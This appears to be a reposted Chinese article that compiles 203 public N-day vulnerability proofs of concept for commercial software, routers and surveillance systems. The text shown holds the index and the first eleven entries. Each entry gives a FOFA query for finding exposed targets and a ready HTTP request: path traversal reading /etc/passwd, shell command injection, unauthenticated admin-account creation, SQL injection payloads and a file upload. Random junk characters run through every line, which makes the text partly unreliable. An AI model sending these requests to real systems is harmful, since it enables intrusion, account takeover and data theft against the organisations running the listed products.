互联网公开漏洞整理202309-202406. {( V0 a: e& u# _) j7 g& p
道一安全 2024-06-05 07:41 北京5 S+ r$ ~& ]! @
以下文章来源于网络安全新视界 ,作者网络安全新视界 K6 X% W& |9 t% T$ C
! `2 F! t8 o& B7 c( i; b发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。; X! l5 V3 d; z2 ~) }+ j. F% }
9 m) Z$ G3 J4 U9 \# T漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
! f$ B r8 z0 _8 s. k
, i0 W8 h E: J$ w4 ^安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。' G( g) ]8 ]* H
( d- Y# t( z6 J/ U. ]) U文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。* g2 v) m Z" S3 e: Y
* @! z$ f* _+ u3 q2 ^合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。5 I1 P$ c4 h. h
. {! \5 K- t5 r2 B% Y, h: V8 W: @$ ?' j& q8 j
声明
t# c: g* V1 a D$ @% Q( ~
4 K! o& H7 [8 v/ j, [# b& z为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
' W; d6 x6 ?* Z6 f2 h! t, A
) [ d! o7 U9 N8 b有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
( F: g( p0 M0 G3 K6 e* `. ? Y/ v% B" R
& p D# B/ u+ ^5 ^% U3 p
9 Q! T# s% b% Y: {, i& i2 G/ T3 k目录
6 E# i7 u( r5 v8 @( z( g* z0 y( k. Q. I9 b" D9 I
01
+ \5 N/ ]' H7 H' W: D! d$ o
% ~7 w% l/ V% n, R+ d1. StarRocks MPP数据库未授权访问
) u9 R8 S# R7 Z5 G& h; T2. Casdoor系统static任意文件读取
5 y6 |- Q" T8 O4 D) B3. EasyCVR智能边缘网关 userlist 信息泄漏
" }1 O; {0 h9 C8 n& Y& B4. EasyCVR视频管理平台存在任意用户添加; N$ L1 q; _3 \0 d% L$ E% `
5. NUUO NVR 视频存储管理设备远程命令执行* u& \* r6 B5 }1 l+ Q
6. 深信服 NGAF 任意文件读取1 I7 h& O3 _2 J" x' t
7. 鸿运主动安全监控云平台任意文件下载
" K9 I2 ], i2 |9 k8. 斐讯 Phicomm 路由器RCE8 Q& _% r( D! e0 N0 E4 _
9. 稻壳CMS keyword 未授权SQL注入
. s- H$ ~$ f) X9 R# @: M10. 蓝凌EIS智慧协同平台api.aspx任意文件上传2 [" E+ ^( l) i; Q5 ^
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入% a$ t+ L9 V3 P/ I7 h
12. Jorani < 1.0.2 远程命令执行: w& T+ D9 q f' e& J$ D
13. 红帆iOffice ioFileDown任意文件读取
0 @. g/ @( Q4 @* `, J6 H14. 华夏ERP(jshERP)敏感信息泄露5 x+ l) _( Y6 M2 M% {" @2 c
15. 华夏ERP getAllList信息泄露
# Z8 ?5 ~ q4 C* y: j W16. 红帆HFOffice医微云SQL注入
' Q5 s2 H2 E% j2 X& R D17. 大华 DSS itcBulletin SQL 注入
( u4 F/ v/ k# a$ }: `" |18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
r( M5 _ Y4 {6 M19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
* v9 T5 k1 r" Y' v6 z/ \. |( {20. 大华ICC智能物联综合管理平台任意文件读取
D5 u# Z# `" Y- |% T21. 大华ICC智能物联综合管理平台random远程代码执行, b6 n: J. E7 T$ c
22. 大华ICC智能物联综合管理平台 log4j远程代码执行* L. k4 A7 M8 c
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
/ {2 e2 J; h9 r2 m3 K24. 用友NC 6.5 accept.jsp任意文件上传! z7 Z9 u1 ^5 [
25. 用友NC registerServlet JNDI 远程代码执行
5 }" W/ V) P X7 h26. 用友NC linkVoucher SQL注入
2 R$ }( |1 p2 ?2 R5 T( P2 v8 O27. 用友 NC showcontent SQL注入
s" z+ p z; G* N9 M28. 用友NC grouptemplet 任意文件上传
f, y, h$ ^# v" n9 M! x- v' A29. 用友NC down/bill SQL注入
8 b8 f {- g9 c% |) o T30. 用友NC importPml SQL注入" ~6 `4 y1 @! ~7 f, D% w+ f. Q
31. 用友NC runStateServlet SQL注入
( g9 r$ M1 }8 Y; I2 m32. 用友NC complainbilldetail SQL注入
* n4 ?9 R5 V4 r5 }' X33. 用友NC downTax/download SQL注入" o( P( c1 s# a: b* }
34. 用友NC warningDetailInfo接口SQL注入
" }/ a0 ?. m4 r; _, I35. 用友NC-Cloud importhttpscer任意文件上传# }# F% j! j ]8 _" M) \- b P
36. 用友NC-Cloud soapFormat XXE
* d, M3 w8 `4 I+ o37. 用友NC-Cloud IUpdateService XXE
% j9 U2 E. n; Q" s* i. ?/ P38. 用友U8 Cloud smartweb2.RPC.d XXE
5 Y F$ x% y' a( z39. 用友U8 Cloud RegisterServlet SQL注入( U. m6 s( e! w' s; m5 @/ }0 Q
40. 用友U8-Cloud XChangeServlet XXE0 ?- ?* f! P1 `/ q$ |
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入) R3 R$ \5 Z5 w' E7 ?2 N! z
42. 用友GRP-U8 SmartUpload01 文件上传, O) V8 y( e8 T1 `" z
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
4 X: d$ Z0 ], M9 d+ X, U, u44. 用友GRP-U8 bx_dj_check.jsp SQL注入
. k- k, I- A+ | ~/ D45. 用友GRP-U8 ufgovbank XXE8 |- l ~: @; S+ m8 Q! X7 ]
46. 用友GRP-U8 sqcxIndex.jsp SQL注入3 Q6 [% Y+ G8 i0 u! a9 s( C
47. 用友GRP A++Cloud 政府财务云 任意文件读取
3 ?( O- ]5 M; { w6 a3 _$ _( F48. 用友U8 CRM swfupload 任意文件上传. A' Y3 O/ Q8 `
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
" K6 U8 P6 D; i. n50. QDocs Smart School 6.4.1 filterRecords SQL注入
/ f4 k- @" ~2 U8 I U9 u j1 x. x1 e51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
$ k" e/ a& A* b1 a52. 泛微E-Office json_common.php sql注入9 D( U$ u# N) {
53. 迪普 DPTech VPN Service 任意文件上传
$ G/ x8 m {& p% S" T54. 畅捷通T+ getstorewarehousebystore 远程代码执行0 s4 S" n6 z: {6 h
55. 畅捷通T+ getdecallusers信息泄露( o7 e7 D8 Y; S5 k
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
. b* \( ^' g$ q% O' l$ r# O# n0 a57. 畅捷通T+ keyEdit.aspx SQL注入, W) Z' O" U1 u- p2 L0 {" h
58. 畅捷通T+ KeyInfoList.aspx sql注入
& j8 `, _! h3 I. t- S59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行/ g8 a+ s. b6 Z; u
60. 百卓Smart管理平台 importexport.php SQL注入8 j8 J; X3 i) T3 M9 v3 g, `6 O
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
8 ~. t' B5 u, a M. ]6 Z0 F62. IP-guard WebServer 远程命令执行. j2 P8 d- d! M+ }6 f1 X
63. IP-guard WebServer任意文件读取" e4 ?* N9 g3 B/ Y Q. [' u
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
* |! }$ u; ?+ x- w65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过& U* X I+ Q8 [
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入" L$ U$ t$ x2 m. Y
67. 万户ezOFFICE wpsservlet任意文件上传1 a& h$ `1 N9 x; S) m
68. 万户ezOFFICE wf_printnum.jsp SQL注入# O1 p" k) d8 x. j/ s
69. 万户 ezOFFICE contract_gd.jsp SQL注入+ R7 ?3 }5 p# c3 t" u$ x$ p
70. 万户ezEIP success 命令执行; o- [" \9 j: o" j! Y
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入4 s8 o3 Z$ a) f5 f; w- `
72. 致远OA getAjaxDataServlet XXE
# X8 [) j, @' u* m# Q4 t$ k1 C% C73. GeoServer wms远程代码执行
@* V. Q) j1 W d74. 致远M3-server 6_1sp1 反序列化RCE. @9 d" l" ?) d
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
7 M. e" x, j9 c/ ^+ q: e7 L76. 新开普掌上校园服务管理平台service.action远程命令执行
- T9 {6 h. o+ x77. F22服装管理软件系统UploadHandler.ashx任意文件上传
5 o/ J( t# q @+ I$ w& a78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
# W) F0 q3 f, N1 X79. BYTEVALUE 百为流控路由器远程命令执行& W/ T* v& s: @: [' { c: f
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
- G% }2 q4 C) r, i81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
6 g0 {& ?, A9 n( R* d' a" v82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
! M8 x1 g; t+ ^4 i0 G# J/ k, B83. JeecgBoot testConnection 远程命令执行3 @# @! L3 F; A! M
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
( H, _! U2 r3 w7 j85. SysAid On-premise< 23.3.36远程代码执行
+ I& o$ P+ E' f86. 日本tosei自助洗衣机RCE
+ q$ s4 x# n- d {* T, F. U# D8 h87. 安恒明御安全网关aaa_local_web_preview文件上传
5 L; Y& G# K. [; X3 y2 b88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行# L$ O: z; {4 S6 y4 K* C: @7 _1 {
89. 致远互联FE协作办公平台editflow_manager存在sql注入
! T7 c3 @2 P0 {4 t2 _7 G# V& g8 n90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
7 c. t6 _1 q! y9 G$ C; w+ i91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
8 z) R1 Z; k3 i, E# d( f92. 海康威视运行管理中心session命令执行9 \4 R4 H9 D, @; ]' f( U* ~- @. r
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
$ i; V0 N' n% M( {9 n& B" Z94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
6 |" ~/ [0 c- G7 y0 u95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行 Z. V9 M% O# Y( b2 u
96. Apache OFBiz 18.12.11 groovy 远程代码执行
, Q5 t5 x# x& z& Z: c4 B1 n97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行+ q1 j/ o8 B; K7 ?5 C. E
98. SpiderFlow爬虫平台远程命令执行8 V( C7 m$ a$ G! z* g
99. Ncast盈可视高清智能录播系统busiFacade RCE
' W# U9 @8 E& } X3 m/ A j- |100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
" B% @, L N; j Z* z8 O101. ivanti policy secure-22.6命令注入
6 L7 |/ B% W7 F! H$ C- @0 B102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
* [$ Y$ @& Q9 Y& Z5 e( l103. Ivanti Pulse Connect Secure VPN XXE3 o4 B) i+ K5 ?/ t/ \3 s
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
0 I9 c5 o/ ]9 F2 r7 v105. SpringBlade v3.2.0 export-user SQL 注入
. E2 x+ R/ ?6 l1 ]2 ?. ]106. SpringBlade dict-biz/list SQL 注入
' c& l7 ?) @& D% M. w4 @; `% ?8 f107. SpringBlade tenant/list SQL 注入6 ~! r; } S1 ~6 k1 F8 r; f; R# T
108. D-Tale 3.9.0 SSRF$ E% _, U. D( [8 z/ s8 a. I
109. Jenkins CLI 任意文件读取/ J. d" ]) ]; l& A: u- Q
110. Goanywhere MFT 未授权创建管理员
8 F2 j; x5 u& y111. WordPress Plugin HTML5 Video Player SQL注入
3 o% `' `2 s$ ]* m; P112. WordPress Plugin NotificationX SQL 注入
; ^4 m9 [, g: {' o: a0 y113. WordPress Automatic 插件任意文件下载和SSRF/ h- w/ c0 _& D5 X! H. M" }
114. WordPress MasterStudy LMS插件 SQL注入
1 M# b0 }# }, A% O115. WordPress Bricks Builder <= 1.9.6 RCE, W' E( K$ v# h
116. wordpress js-support-ticket文件上传
6 h5 c6 E4 g. X$ B# M117. WordPress LayerSlider插件SQL注入
; X: e* ~+ ~0 W5 g6 w118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
. R$ L4 ^' }8 k. R) N5 f119. 北京百绰智能S20后台sysmanageajax.php sql注入
! C3 x; o, k7 Y/ b+ V2 ?9 j. S120. 北京百绰智能S40管理平台导入web.php任意文件上传
' c* f$ e' l2 Q/ \7 P121. 北京百绰智能S42管理平台userattestation.php任意文件上传
6 U6 ]# A+ }" ~) b: {0 y8 h122. 北京百绰智能s200管理平台/importexport.php sql注入8 ?0 @/ |7 o! s9 T" ^' C
123. Atlassian Confluence 模板注入代码执行
& J* o Y0 }. }, V/ W9 ^7 o124. 湖南建研工程质量检测系统任意文件上传6 x/ h8 u6 \* _' q# ^# r
125. ConnectWise ScreenConnect身份验证绕过
F, @, @7 \# {& Q! X7 D2 n9 B126. Aiohttp 路径遍历* j8 U/ W" z5 g3 Q
127. 广联达Linkworks DataExchange.ashx XXE
/ G# X, ~6 Y, p" i# g$ q128. Adobe ColdFusion 反序列化
8 s- | j4 j% S2 |129. Adobe ColdFusion 任意文件读取$ s6 f1 q; }6 S8 b4 _4 J
130. Laykefu客服系统任意文件上传4 r; v; p+ ]$ A$ a9 Z: Y- N7 Y
131. Mini-Tmall <=20231017 SQL注入9 W" w+ s7 R* j: m; x
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过0 y- }! [5 P- D
133. H5 云商城 file.php 文件上传* O. d9 T! O9 V$ Z
134. 网康NS-ASG应用安全网关index.php sql注入
! h# o e. o/ P; [3 N5 U$ O135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入5 @2 j. e) s( ^4 V5 h
136. NextChat cors SSRF' ]( G5 l$ f+ t
137. 福建科立迅通信指挥调度平台down_file.php sql注入
2 r! X8 H0 X# i* ~138. 福建科立讯通信指挥调度平台pwd_update.php sql注入; U6 R% K* k* o1 `
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
+ b3 G8 p" I7 Q. C. w1 L! p L0 o* z140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入, D4 J$ C; q# g5 D* O$ W6 u
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入; d" p% T4 M3 U* i
142. CMSV6车辆监控平台系统中存在弱密码0 p0 X- R# d! n
143. Netis WF2780 v2.1.40144 远程命令执行- z" y' d3 f! M( M0 |8 v7 j6 N
144. D-Link nas_sharing.cgi 命令注入
# I- V/ s1 P: f1 d& `3 y2 V" H145. Palo Alto Networks PAN-OS GlobalProtect 命令注入! F$ I# W/ c( }: u$ V0 R& e. M
146. MajorDoMo thumb.php 未授权远程代码执行
( U2 W; U. `9 L9 S0 q147. RaidenMAILD邮件服务器v.4.9.4-路径遍历/ {+ j: ?: i2 y! E; f: l) u9 Z5 h
148. CrushFTP 认证绕过模板注入# d! m# g/ W1 j. y0 i( G
149. AJ-Report开源数据大屏存在远程命令执行
1 g8 a$ M4 I5 T! a# @; R7 P1 P150. AJ-Report 1.4.0 认证绕过与远程代码执行
; H2 o1 f. p6 h5 a0 A* ^8 A# o' X151. AJ-Report 1.4.1 pageList sql注入
4 z n' B# @4 [/ l5 W152. Progress Kemp LoadMaster 远程命令执行' v( K; ^2 t- h
153. gradio任意文件读取) U1 y5 _' V: K
154. 天维尔消防救援作战调度平台 SQL注入; F; n4 I6 O& @: c9 m; @1 \- ^ S
155. 六零导航页 file.php 任意文件上传
3 J, \ v, V, m* u5 e8 Q7 t156. TBK DVR-4104/DVR-4216 操作系统命令注入
' |" g t @! G+ D157. 美特CRM upload.jsp 任意文件上传3 [; I l/ ?$ z0 s9 g+ h2 U
158. Mura-CMS-processAsyncObject存在SQL注入# a9 n' ]9 O- p. ]7 U6 C" t
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传; Z+ c p$ |+ `6 I! l; F. }
160. Sonatype Nexus Repository 3目录遍历与文件读取
2 j# k/ o" C) o- c# l8 }# h7 `161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传5 e( s, T- {3 V. I" t; W! x
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传( b5 J9 r0 @- Z" ]
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
/ m4 M: A9 z; a1 q8 l7 W# M164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传 D! z' m" j& K) N
165. OrangeHRM 3.3.3 SQL 注入$ N8 }5 }& w8 w4 w3 M; C: H
166. 中成科信票务管理平台SeatMapHandler SQL注入
; J1 {. P' {" ?* V0 H' X# P167. 精益价值管理系统 DownLoad.aspx任意文件读取
$ n: q( R8 D3 O# X( A# I168. 宏景EHR OutputCode 任意文件读取
! r$ U1 ^ e8 s9 {- {169. 宏景EHR downlawbase SQL注入) t9 j6 z' m" w4 P, p2 l
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
* |; S( _4 @% ^: s171. 通天星CMSV6车载定位监控平台 SQL注入+ V7 B' t3 V1 h# d; }4 i
172. DT-高清车牌识别摄像机任意文件读取( h9 v) ~% _, G! U; n* }3 e5 @
173. Check Point 安全网关任意文件读取* n% B1 p" }& X% a/ N# g
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
1 |% H; s) Q6 F% V' Y6 J175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入2 {8 l* Y" x, x4 ]2 ~, n
176. 电信网关配置管理系统 rewrite.php 文件上传: w; h7 f0 e: I. v9 g5 k
177. H3C路由器敏感信息泄露
" n9 i! j. U% R178. H3C校园网自助服务系统-flexfileupload-任意文件上传
: w( ?6 @: e$ n; c* O6 D179. 建文工程管理系统存在任意文件读取$ v+ n4 |" t! b. i4 a q1 p
180. 帮管客 CRM jiliyu SQL注入! o" u: K6 n1 T; K. [& V3 z8 |
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入5 p% \$ M5 Y2 O5 c! Y5 `
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
5 ~' |$ \4 j/ Z O& m183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
7 F. W( o- N/ Y, @* x" f4 x184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加1 t( T- ?# w* |% Z* {4 Z8 ]
185. 瑞友天翼应用虚拟化系统SQL注入+ a3 I% G2 s9 ?7 _5 D
186. F-logic DataCube3 SQL注入3 m' W$ D; k4 R& ~+ A% z& L
187. Mura CMS processAsyncObject SQL注入( Q* T3 }) k$ y* R- ?
188. 叁体-佳会视频会议 attachment 任意文件读取
/ C U3 Y! ]3 S! L$ p1 g189. 蓝网科技临床浏览系统 deleteStudy SQL注入
# k$ z/ Q8 E# Y& ?190. 短视频矩阵营销系统 poihuoqu 任意文件读取/ T" K" R* q( r( S8 V4 G
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
& A& F; M& w* H! ?0 D2 G# {192. 富通天下外贸ERP UploadEmailAttr 任意文件上传, x+ `2 t. [) `4 o$ \
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
; d: v7 G- ]+ f+ }194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传1 k. G& Z Q! W9 R) V5 {: z
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行% d0 F' s% \& ~8 _2 B8 O
196. 河南省风速科技统一认证平台密码重置
! p: ~. c1 t: K! k" u197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入! a) L) ^5 `' a
198. 阿里云盘 WebDAV 命令注入( U" o. R! \/ V0 H( o+ F
199. cockpit系统assetsmanager_upload接口 文件上传" |2 ~4 i; v4 y. g/ q
200. SeaCMS海洋影视管理系统dmku SQL注入
) E( q# ^( |9 v% y201. 方正全媒体新闻采编系统 binary SQL注入
3 ]1 t, L2 q( C+ K% ]! A3 s202. 微擎系统 AccountEdit任意文件上传! b# g+ B+ c! H& u) q( z$ a6 M
203. 红海云EHR PtFjk 文件上传
! ^5 A1 J& K# [+ x# i
' R/ R9 r& _$ a- R# X3 k& P% H- jPOC列表0 a- ?; w8 D9 t) d& v) j" H
' U7 D/ s+ _. ]02
$ O9 p* B1 ?7 t/ o; }$ b2 e+ H+ R% e u% z/ c
1. StarRocks MPP数据库未授权访问
1 M- B5 W/ n: T3 MFOFA :title="StarRocks"
, i! ?- l+ i3 F% [' sGET /mem_tracker HTTP/1.1
; |' m0 G' [( wHost: URL7 m# Y0 E+ Q0 g5 x& I% C# l+ d1 v
( J- Z, R5 x4 V O1 O6 n/ }
9 x' q& i9 o* m& p) L" L2. Casdoor系统static任意文件读取
3 j, u8 W8 Y# J. ~FOFA :title="Casdoor"
' s+ J/ E9 r; [1 R: h( }GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1' P5 g+ i. V6 |) w0 X7 l
Host: xx.xx.xx.xx:99993 x3 a: Z& D k
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) Y; a5 {% `9 \5 s) ~5 O, L: vConnection: close# X5 }3 R3 d' a; d% f
Accept: */*% G0 d0 B: b! w4 G
Accept-Language: en
5 o" C( A( T5 |) S' ?Accept-Encoding: gzip
: ]& D& A* x0 q8 `/ v
: G8 [) k8 H0 B" M
, B" V9 g7 J" x9 B8 R3 E1 G: v+ [! h& r3. EasyCVR智能边缘网关 userlist 信息泄漏- }% ?8 A' D' ]8 E9 X
FOFA :title="EasyCVR"
5 a" P: w ~# R/ C$ MGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.17 V$ |# } B+ b) O- A0 e4 M
Host: xx.xx.xx.xx# b% y2 a& I6 ]. {/ {
& R6 q. I' `+ g/ `
) q9 Y1 v; o3 x4 Y" \2 @ z
4. EasyCVR视频管理平台存在任意用户添加
* ?3 D+ B2 h/ r, q* v$ DFOFA :title="EasyCVR"$ d5 H9 `+ u% Z7 V# w" f+ t1 g
, B& T% O% s5 q' N7 ?7 J) Jpassword更改为自己的密码md5
2 [0 a* G; C% tPOST /api/v1/adduser HTTP/1.1
& P3 i# w4 W( ]- m0 \2 [$ LHost: your-ip
0 f& P' `' b2 k& V i' h6 tContent-Type: application/x-www-form-urlencoded; charset=UTF-8" e! I( o s; _7 W, y, S6 D
4 n# {% ^5 j/ Z( b
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1- U9 h( u- B9 k6 u% Y0 t
5 s7 \1 l! D, g$ q+ v. K2 s7 u4 C
: k" `- ~8 R8 V" B
5. NUUO NVR 视频存储管理设备远程命令执行
9 N2 J/ Z, k+ q3 T' S- GFOFA:title="Network Video Recorder Login". e3 J0 y; l' X$ y$ ^
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1$ b0 _- B. D$ y h& H" W, K
Host: xx.xx.xx.xx
% I4 `7 ~5 I3 z/ y! p; Y h1 U& T* j: w) _( T/ a
4 m% t; H1 {) J! f$ H+ T/ L7 a6. 深信服 NGAF 任意文件读取2 N2 `# i0 {& h% a! w4 Q+ M
FOFA:title="SANGFOR | NGAF", V6 w9 C4 {" T$ `
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
" D2 K* J: h8 A# @& `2 vHost:
% H6 @# H2 p, L1 d* R( b! J
4 Q7 A( I3 m, p5 P" R0 R4 e/ f y( C9 o: S/ o, x7 C
7. 鸿运主动安全监控云平台任意文件下载& s( j/ t; @+ }( m' W
FOFA:body="./open/webApi.html"
+ ]/ p" i0 p; `0 T! p2 K9 c/ _GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
0 n; m+ G; m- _- LHost:
0 e3 l8 g& T4 Q$ n( R" N
+ \7 q1 G. W( ^* @: r! Q
8 E# c% o0 C3 X+ H% @) {/ a8. 斐讯 Phicomm 路由器RCE
" i, c2 G9 ~ d1 H; g" IFOFA:icon_hash="-1344736688"
% q M" B- ~3 P. `! `3 Y4 B, e1 f默认账号admin登录后台后,执行操作& l5 y$ e. K+ J" L" V& P
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
3 s; V4 J7 r/ Z9 P* W1 bHost: x.x.x.x
4 v) h3 O) m0 x. u9 V7 gCookie: sysauth=第一步登录获取的cookie
0 w4 a. m1 \4 Y7 X8 KContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
# M1 |; c5 w& EUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
, }% [" k+ z% [& |. G$ f
; f' i) V( u3 G: z------WebKitFormBoundaryxbgjoytz' R- L. ]0 y- `
Content-Disposition: form-data; name="wifiRebootEnablestatus"3 b I% U! J3 \ ^7 ^' i
3 x* a% U2 x' t! k- e% d: D
%s
3 ]" E3 l; p" X+ x. U------WebKitFormBoundaryxbgjoytz
) v4 S& [; k3 h0 M- B0 }Content-Disposition: form-data; name="wifiRebootrange"
`+ z9 }" ]* b
9 k. |7 p1 s! J6 f0 B12:00; id;6 ~ p1 i8 k+ u: a; _* x5 z% a
------WebKitFormBoundaryxbgjoytz9 z: o6 U6 |* a% z# v5 B4 e* W
Content-Disposition: form-data; name="wifiRebootendrange"
) u! K% n/ N8 X: _ J$ W5 l
6 F6 Q9 U* k2 d- f: n%s:% S7 d8 K6 S8 K# n
------WebKitFormBoundaryxbgjoytz
, U! v. r$ q) d9 j' YContent-Disposition: form-data; name="cururl2"
( j! k6 c. j' E+ N
1 }8 ^) N6 e# T( y% o) m9 i8 q
* P/ l7 Y8 {% z- Q$ h! s------WebKitFormBoundaryxbgjoytz--% U! ?; N2 U* V" e; q: r
5 V) z- ^8 c. u( T/ ?
4 I& n z t. ^9. 稻壳CMS keyword 未授权SQL注入5 h- @ P8 k1 L) U: y
FOFA:app="Doccms"
/ |5 h/ {# g" l4 j: |1 w kGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1- R4 V% }" d* ~
Host: x.x.x.x
5 \/ N$ R' }+ l% X3 [ W4 k7 v7 E. L- n
7 o1 t! A4 n! Z. [+ H( vpayload为下列语句的二次Url编码
, a7 t. W1 B {, b& ~: {/ S7 L: D) j2 t, S
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
6 Q# P# y4 T9 F& o. {+ |# X' U/ O+ a$ Y0 T' A2 q
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传" J( d) M8 C7 t% ?+ ~
FOFA:icon_hash="953405444"+ ~9 J" s+ w2 l2 s
$ Z& k9 n, H% W, l( [- b3 W% d4 d d文件上传后响应中包含上传文件的路径
* z& _# f$ Z( }4 g6 SPOST /eis/service/api.aspx?action=saveImg HTTP/1.17 G+ X9 j; V- M. k3 r! p
Host: x.x.x.x:xx
$ b/ H3 B U/ V' b; U% j, W7 Y% tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
) b- |4 u$ c* P& C gContent-Length: 1979 a8 g9 m% N; V- H3 \) A! X2 H2 {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9, b3 Q) U, p7 B) R; u" s3 R
Accept-Encoding: gzip, deflate: k+ I1 H7 m, S2 j7 T6 Q% _
Accept-Language: zh-CN,zh;q=0.92 n8 [$ s3 m* U' h) P. O; s# i5 w
Connection: close
- d4 Q$ _7 O2 o: ~0 R8 uContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
4 M1 }$ w& J% T+ l- _' n% }1 M3 U' Z4 K$ L8 t1 B
------WebKitFormBoundaryxdgaqmqu
; C! n, A1 P' C2 I" p0 |Content-Disposition: form-data; name="file"filename="icfitnya.txt"
1 C3 C- B$ F$ v5 uContent-Type: text/html
6 }' `$ D4 T' c. }. l9 S
; F6 H7 R3 y2 ]/ xjmnqjfdsupxgfidopeixbgsxbf
9 i# T' W a% \; h; b: w" u------WebKitFormBoundaryxdgaqmqu--* N/ O* x3 ^: M7 A9 z
; ]! K! m' M, m1 o: {- i( f
$ Y4 v1 \# m4 ]- m2 \) `0 n! a11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
+ t! u. w( {4 u2 R) m4 qFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
7 Z3 r/ \ I) R( J7 {* q# pGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
